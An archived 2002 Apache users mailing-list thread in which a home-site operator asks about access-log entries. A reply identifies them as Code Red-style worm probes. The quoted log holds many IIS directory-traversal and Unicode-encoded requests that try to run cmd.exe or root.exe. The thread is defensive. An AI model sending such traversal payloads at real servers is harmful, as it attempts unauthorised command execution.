httpd-users mailing list archives

Site index · List index
Message view « Date » · « Thread »
Top « Date » · « Thread »
From "Robert Douglass" <r.dougl...@onlinehome.de>
Subject Re: access log
Date Fri, 19 Apr 2002 09:07:12 GMT
Steve,
Thank you for the information. I'm not a trained system administrator, and I
have to admit, I don't know what you mean, "try some checks on the input and
redirect if you find any expoint attempts". I am on  a Win32 system (2000
pro).
-R.D.
----- Original Message -----
From: "Steve Leach" <sleach@askalix.com>
To: <users@httpd.apache.org>
Sent: Friday, April 19, 2002 10:55 AM
Subject: Re: access log


> This is Code Red or something like it.
> See the following: http://www.cert.org/advisories/CA-2001-19.html
> Note that Apache should be fine - also that if you are running *nix you
are
> OK.
> If on a Win32 system you could try some checks on the input and redirect
if
> you find any exploit attempts!!!
>
> Best Regards,
>
> Steve Leach
> Network Manager
> Mi-Int Limited
> Eaglescliffe Logistics Centre
> Durham Lane
> Egglescliffe
> URL: http://www.askalix.com
> TEL: 01642 356205
> e-mail: sleach@askalix.com
>
> ----- Original Message -----
> From: "Robert Douglass" <r.douglass@onlinehome.de>
> To: <users@httpd.apache.org>
> Sent: Friday, April 19, 2002 9:43 AM
> Subject: access log
>
>
> > Hello, I've been hosting a tiny website from my home for the past week,
as
> a
> > temporary project, and I found the following in my access log:
> >
> > "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 290
> > "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 288
> > "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
> > "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
> > "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 312
> > "GET
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
> > HTTP/1.0" 404 329
> > "GET
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
> > HTTP/1.0" 404 329
> > "GET
> >
>
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/sy
> > stem32/cmd.exe?/c+dir HTTP/1.0" 404 345
> > "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 311
> > "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 311
> > "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 311
> > "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 311
> > "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400
295
> > "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 295
> > "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404
> 312
> > "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 312
> >
> > Does anybody have an idea what someone was trying to accomplish with
this,
> > or if these requests may have originated from my ISP? Does anybody have
> any
> > suggestions on how to implement some basic security (I've done nothing!)
> to
> > protect myself? I'm using Apache 1.3.22. Thank you,
> >
> > Robert Douglass
> >
> >
> > ---------------------------------------------------------------------
> > The official User-To-User support forum of the Apache HTTP Server
Project.
> > See <URL:http://httpd.apache.org/userslist.html> for more info.
> > To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
> > For additional commands, e-mail: users-help@httpd.apache.org
> >
>
>
> ---------------------------------------------------------------------
> The official User-To-User support forum of the Apache HTTP Server Project.
> See <URL:http://httpd.apache.org/userslist.html> for more info.
> To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
> For additional commands, e-mail: users-help@httpd.apache.org
>


---------------------------------------------------------------------
The official User-To-User support forum of the Apache HTTP Server Project.
See <URL:http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
For additional commands, e-mail: users-help@httpd.apache.org


Mime
View raw message